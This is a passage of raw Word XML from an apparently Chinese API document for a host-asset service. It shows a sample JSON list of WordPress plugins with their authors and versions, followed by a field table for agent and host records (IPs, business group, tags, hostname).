        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Html5 File Upload",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginUri":"http://wordpress.org/extend/plugins/jquery-html5-file-upload/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> plugin adds a file upload functionality to the front-end </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>screen. It allows multiple file upload asynchronously along with upload status bar.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sinashshajahan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":" ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"3.0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Roomcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"http://www.roomcloud.net",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Plugin to add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>roomcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> booking form to hotel website using [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>roomcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shortcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Raffaello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bindi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"http://www.roomcloud.net",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"1.3"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"Hello Dolly",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"http://wordpress.org/plugins/hello-dolly/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from &lt;cite&gt;Hello, Dolly&lt;/cite&gt; in the upper right of your admin screen on every page.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>author":"Matt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Mullenweg",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"http://ma.tt/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"1.6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Akismet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"https://akismet.com/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"Used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by millions, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Akismet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is quite possibly the best way in the world to &lt;strong&gt;protect your blog from spam&lt;/strong&gt;. It keeps your site protected even while you sleep. To get started: 1) Click the \"Activate\" link to the left of this description, 2) &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=\"https://akismet.com/get/\"&gt;Sign up for an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Akismet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> plan&lt;/a&gt; to get an API key, and 3) Go to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Akismet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration page, and save your API key.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Automattic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorUri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"https://automattic.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-plugins/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"3.1.11"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976992E"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521"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="3984"/>
        <w:gridCol w:w="3622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C0AF38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5DF6528" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46389B81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B273E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D14A501" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16598C3F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2D458E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D22550" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62EE47E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A493A96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="722C5C6D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04661B1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2AF349" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C429DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E86BDCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CCD22CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE2C493" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589C025C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74135DC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2601C41C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BA27E59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BC7733" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D35B4DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7068A494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="797EAC3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E2DC6D1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D5DC3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6F3467" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B3A3340" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CD0461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CAAEBB1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D312800" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D86D4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16E612FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13736308" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3106CBDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5420D192" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A14B9F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582DF53E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7626292E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44FC5D93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC7A464" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41FA78A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F28C55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FE7C89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32181BEA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="209EA706" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017A43C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A863441" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198F8619" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D08E931" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F3A7A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B730AEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677729D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618C4391" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EE8D41B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39E6DCA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
